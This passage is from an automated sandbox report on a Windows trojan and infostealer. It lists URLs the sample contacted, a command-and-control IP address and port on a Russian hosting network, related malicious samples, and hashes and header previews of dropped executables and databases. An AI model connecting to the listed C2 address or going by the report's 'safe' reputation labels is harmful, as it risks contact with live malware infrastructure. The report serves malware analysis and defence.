                  https://api.ipify.orgcookies//settinString.Removegr.exe, r.exe, 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2004/08/addressingr.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://api.ipify.orgcookies//settir.exefalse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/Endpoint/GetUpdatesResponser.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchr.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.drfalse
                  • URL Reputation: safe
                  unknown
                  http://195.2.75.12:54762r.exe, 00000007.00000002.2165535966.0000000003C52000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2165535966.0000000003BB6000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://ns.adp/1.0/r.exe, 00000007.00000002.2159196933.0000000000E0E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/Endpoint/EnvironmentSettingsResponser.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/Endpoint/VerifyUpdater.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/0r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name3.exe, 00000002.00000002.4157787084.0000000003381000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://ns.microsofo/1.2/r.exe, 00000007.00000002.2159196933.0000000000E0E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.drfalse
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/soap/actor/nextr.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  195.2.75.12
                  unknownRussian Federation
                  48282VDSINA-ASRUtrue
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1447590
                  Start date and time:2024-05-26 01:20:10 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 9m 43s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:10
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:KR6CT3hIxT.exe
                  renamed because original name is a hash value
                  Original Sample Name:5c95d5493dda877b228a6485a6d40d9c.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@10/48@1/1
                  EGA Information:
                  • Successful, ratio: 80%
                  HCA Information:
                  • Successful, ratio: 80%
                  • Number of executed functions: 202
                  • Number of non-executed functions: 159
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded IPs from analysis (whitelisted): 104.26.13.31, 104.26.12.31, 172.67.75.172
                  • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target r.exe, PID 7776 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size exceeded maximum capacity and may have missing network information.
                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  TimeTypeDescription
                  19:21:15API Interceptor9949938x Sleep call for process: 3.exe modified
                  19:21:44API Interceptor50x Sleep call for process: r.exe modified
                  No context
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  VDSINA-ASRUheic.exeGet hashmaliciousGO BackdoorBrowse
                  • 62.113.116.83
                  poration.exeGet hashmaliciousLummaC, GO Backdoor, LummaC StealerBrowse
                  • 62.113.116.83
                  ChOQ8w8NqZ.exeGet hashmaliciousUnknownBrowse
                  • 195.2.70.38
                  SecuriteInfo.com.Trojan-PSW.Agent.7485.24815.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                  • 94.103.85.47
                  o8JAdiyezt.exeGet hashmaliciousLummaCBrowse
                  • 195.2.70.38
                  4m8RBorBUl.exeGet hashmaliciousLummaCBrowse
                  • 195.2.70.38
                  q49LB2eQuo.exeGet hashmaliciousUnknownBrowse
                  • 195.2.70.38
                  rU53IkLA9a.exeGet hashmaliciousLummaCBrowse
                  • 195.2.70.38
                  file.exeGet hashmaliciousLummaCBrowse
                  • 195.2.70.38
                  XLUjYJYd62.exeGet hashmaliciousXWormBrowse
                  • 195.2.70.16
                  No context
                  No context
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):2666
                  Entropy (8bit):5.345804351520589
                  Encrypted:false
                  SSDEEP:48:MOfHK5HKxHKdHK8THaAHKzecYHKh3oPtHo6nmHKtXooBHKoHzHZHG1qHxLHjHKd2:vq5qxqdqolqztYqh3oPtI6mq7qoT5mwt
                  MD5:1ED541494834162D093573FD2115D38F
                  SHA1:6F58CB1D24DC93858E41DD41C37D0EC952A58C4D
                  SHA-256:08D22F4A9E89E84D0F1FD1C103743BCB8882CA42B34009E75B0D09DEF2F35772
                  SHA-512:861586BF7E93DE73D69200AE9F713100F72209F21A25743DD9AC8EB1949F8C7367A4DF0B6F786AD37189FFF3AA4D9A6780EC35EBBD462A449A1A7926390E5E7A
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,
                  Process:C:\Users\user\AppData\Local\Temp\4.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):3275435
                  Entropy (8bit):7.960471532630706
                  Encrypted:false
                  SSDEEP:49152:z3C/yu7HhFDjCp6OJ+annyUMENjUTtvVVdwxc09AIeHuXwyCIWULif4OkgZLZh:Dw7HXxunnyzT5dwxc090KwaLif4Ok41h
                  MD5:215F503316C98618DC6DB327477FD26F
                  SHA1:136DF5466FF49E2AADB1587E4C94D56175A0085E
                  SHA-256:DBBDE79C77CC64C6F42CA0F69E33561B70377626E7DB42774679F9D602078CD1
                  SHA-512:7C6A5EE768C8AE75AD9112526FA8DE35C214B6DE48435097599AB73B4CA072372EBAA8E59DA2C734E0E4E2F0FAC7187F1AD2A02306625051C7D9147E6D14DA22
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 49%
                  • Antivirus: Virustotal, Detection: 55%, Browse
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u.Rf.................x..........X.^.. ........@.. ..............................._2...@.................................:...P................................................................................................................... ..... ..g<.................. ..`.rsrc................B..............@..@.reloc...............H..............@..B.imports. ...........J..............@....themida..]..........L..............`....boot.....1...^...1..L..............`..`................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\KR6CT3hIxT.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):3597220
                  Entropy (8bit):7.969952348410668
                  Encrypted:false
                  SSDEEP:98304:ntXPgcTaiwjMeSGEFvX8IGnm50ZTC08XAu:tnTa1MeSGEFvsIl50Z+ku
                  MD5:D7E09993B21575A255D4CEAF706C205A
                  SHA1:01B68051AE35E1E12D8827664ACDCF2CB9ED3766
                  SHA-256:939F981D4A948E41999D8E1073418EDB0C2AFC47797AD87E0ECDF7124DF7BDE0
                  SHA-512:37621AF16254F15F273B0E36DFF3927C4F40EF594E150C03F0B693443D16A7D6DE8BED259A290B8AD9E8FE3D754865B06CDCBA8B900722D1EB46487A56EF9D72
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 41%
                  • Antivirus: Virustotal, Detection: 44%, Browse
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........w..w..w..<.V.w..<.T..w..<.U.w....Z.w......w......w......w...$.w...4.w..w..v......w......w....X.w......w..Rich.w..........PE..L......d...............!.....................@....@..........................p............@.............................4.......P....`.......................@...#......T............................f..@............@..x...\... ....................text....-.......................... ..`.rdata......@.......2..............@..@.data...PG..........................@....didat.......P......................@....rsrc........`......................@..@.reloc...#...@...$..................@..B................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\rdegje.exe
                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):3351536
                  Entropy (8bit):7.949728494159924
                  Encrypted:false
                  SSDEEP:49152:9z8kJk+6LnBFVbwfnwiPuUdEeYe8eUGyEesq1Xoy31C8a/opt1wZGyJlEPQF2:Kmc3bw42uLeYe831X3a/Wt2FwQF2
                  MD5:CF1A74B1E40E5C34DF68ADD35DA92129
                  SHA1:C8FAF639D73049F35DE385F2C698F6809C1EAA92
                  SHA-256:3196CC360075B773B4FF9A17EE1A53C6CE32476AF563A910126FDFC02702F4C0
                  SHA-512:83C3B4C16C2A53F1048C37E90C6AD5025B4E143975622BB0388B32AF04B54544AEB3E2415AD7CCCC2381471002732DEEC1F8B96D778EFE6315953C495A0BA634
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 53%
                  • Antivirus: Virustotal, Detection: 53%, Browse
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..t..........X@S.. ........@.. ..............................*.3...@.................................:...P................................................................................................................... ..... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.imports. ..........................@....themida.@Q.........................`....boot....r2..@S..q2.................`..`................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\3.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:modified
                  Size (bytes):3670637
                  Entropy (8bit):7.970948229121397
                  Encrypted:false
                  SSDEEP:49152:nILmL3tkuyXOjQ5pYx2hMo5f+KjruXG07rJVWHkuYjCahEDCccAMqjpizpewEfQj:nX/yGQ5d5f+CiHrJVWeucKpmDEYOvD7A
                  MD5:823F263A3D860454EF8092594FFB7EC0
                  SHA1:707E4B0E1340A72D200BAE4CEE0BD2C22B47E1E7
                  SHA-256:E9E391EF56461E970601392DB1D9ADC8958F1DBC7FB9328D58CFC0601D3C7A3B
                  SHA-512:CCEBDB1AF101A5A05BE7A92797ADD599BFC565DF0849AA404FC1BD5156E02828B7DF6713D8EE66144150006E33CC87A9977F827E9E789D09F251925B12FF7A52
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 34%
                  • Antivirus: Virustotal, Detection: 35%, Browse
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........w..w..w..<.V.w..<.T..w..<.U.w....Z.w......w......w......w...$.w...4.w..w..v......w......w....X.w......w..Rich.w..........PE..L......d...............!.....................@....@..........................p............@.............................4.......P....`.......................@...#......T............................f..@............@..x...\... ....................text....-.......................... ..`.rdata......@.......2..............@..@.data...PG..........................@....didat.......P......................@....rsrc........`......................@..@.reloc...#...@...$..................@..B................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                  Category:dropped
                  Size (bytes):40960
                  Entropy (8bit):0.8553638852307782
                  Encrypted:false
                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                  MD5:28222628A3465C5F0D4B28F70F97F482
                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                  Category:dropped
                  Size (bytes):40960
                  Entropy (8bit):0.8553638852307782
                  Encrypted:false
                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                  MD5:28222628A3465C5F0D4B28F70F97F482
                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                  Category:dropped
                  Size (bytes):40960
                  Entropy (8bit):0.8553638852307782
                  Encrypted:false
                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                  MD5:28222628A3465C5F0D4B28F70F97F482
                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                  Category:dropped
                  Size (bytes):40960
                  Entropy (8bit):0.8553638852307782
                  Encrypted:false
                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                  MD5:28222628A3465C5F0D4B28F70F97F482
                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                  Category:dropped
                  Size (bytes):40960
                  Entropy (8bit):0.8553638852307782
                  Encrypted:false
                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                  MD5:28222628A3465C5F0D4B28F70F97F482
                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):106496
                  Entropy (8bit):1.1358696453229276
                  Encrypted:false
                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                  Malicious:false
                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):106496
                  Entropy (8bit):1.1358696453229276
                  Encrypted:false
                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                  Malicious:false
                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):106496
                  Entropy (8bit):1.1358696453229276
                  Encrypted:false
                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                  Malicious:false
                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):106496
                  Entropy (8bit):1.1358696453229276
                  Encrypted:false
                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                  Malicious:false
                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                  Category:dropped
                  Size (bytes):1026
                  Entropy (8bit):4.695685570184741
                  Encrypted:false
                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                  Malicious:false
                  Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                  Category:dropped
                  Size (bytes):1026
                  Entropy (8bit):4.701757898321461
                  Encrypted:false
                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                  MD5:520219000D5681B63804A2D138617B27
                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                  Malicious:false
